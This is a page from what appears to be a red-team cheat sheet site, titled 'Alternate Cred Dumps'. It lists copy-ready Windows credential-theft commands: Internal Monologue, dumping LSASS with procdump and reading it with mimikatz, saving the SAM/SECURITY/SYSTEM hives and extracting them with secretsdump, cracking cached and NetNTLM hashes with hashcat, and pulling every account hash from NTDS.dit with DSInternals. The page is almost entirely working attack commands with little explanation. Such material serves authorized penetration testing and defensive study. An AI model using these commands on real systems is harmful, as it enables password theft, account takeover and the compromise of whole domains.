πŸ•Ί
πŸ•Ί
πŸ•Ί
πŸ•Ί
CheatSheets
Search…
Introduction
Getting Started With Hacking
VMs on Mac
Windows
Enumeration
Local Privilege Escalation
UAC Bypasses
Persistance
Networking
Active Directory
Offensive Powershell
Enumeration
Lateral Movement
Escalation
Persistance
Mimikatz
Alternate Cred Dumps
MSSQL
Defences and Bypasses
Setting Up a Lab
Red Teaming
Phishing Payloads
Cobalt Strike
Metasploit
Linux
Networking
Enumeration
Local Privilege Escalation
Persistance
MySQL
Mainframes
HP Nonstop
IBM z/OS
Cloud
AWS
GCP
Azure
Web App
Tomcat
SQLMap
PHP
Mobile
Android
iOS
Exploit-Dev
Linux
Shellcode
Windows
WiFi
Alfa AWUS036ACH Setup
Aircrack-ng
Powered By GitBook
Alternate Cred Dumps

Internal Monologue

Internal monologue is a way of dumping creds without touching LSASS.

Using Internal Monologue

1
execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help]
Copied!

Cracking Returned Hashes

1
hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 -force
Copied!

Procdump + Mimikatz

1
# Dump with sysinternal windows signed binary
2
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
3
​
4
# Move lsass.dmp offline and use mimikatz to open and dump passwords
5
mimikatz # sekurlsa::minidump /root/lsass.dmp
6
mimikatz # sekurlsa::logonpasswords
7
​
8
# Viewing dump with invoke-mimikatz
9
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'
Copied!

Reg SAM / Security / System

1
reg save hklm\system system
2
reg save hklm\security security
3
reg save hklm\sam sam
4
​
5
# Extract
6
python secretsdump.py -security security -system system -sam sam LOCAL
7
​
8
# Cracking MS-Cachev2 hashes recovered
9
Make the this format:
10
$DCC2$10240#username#hash
11
​
12
Crack:
13
hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable
Copied!

Offline DCSync

1
# For this you need the NTDS.dit file and the SYSTEM registry hive
2
# You will also need DSInternals PowerShell module. This can be moved across machines.
3
​
4
# Import DSInternals
5
import-module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1
6
​
7
# Grab the bootkey from SYSTEM hive. This can be one offline or in a mounted DC VM.
8
$key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM
9
10
# Extract user information from NTDS.dit
11
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key
12
13
# Extract Hashes from NTDS.dit in a dcsync format
14
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File vault-hashes.txt -Encoding ASCII
15
​
16
# File can then be cracked, used as normal DCSync would.
Copied!
Active Directory - Previous
Mimikatz
Next - Active Directory
MSSQL
Last modified 1yr ago
Copy link
Contents
Internal Monologue
Procdump + Mimikatz
Reg SAM / Security / System
Offline DCSync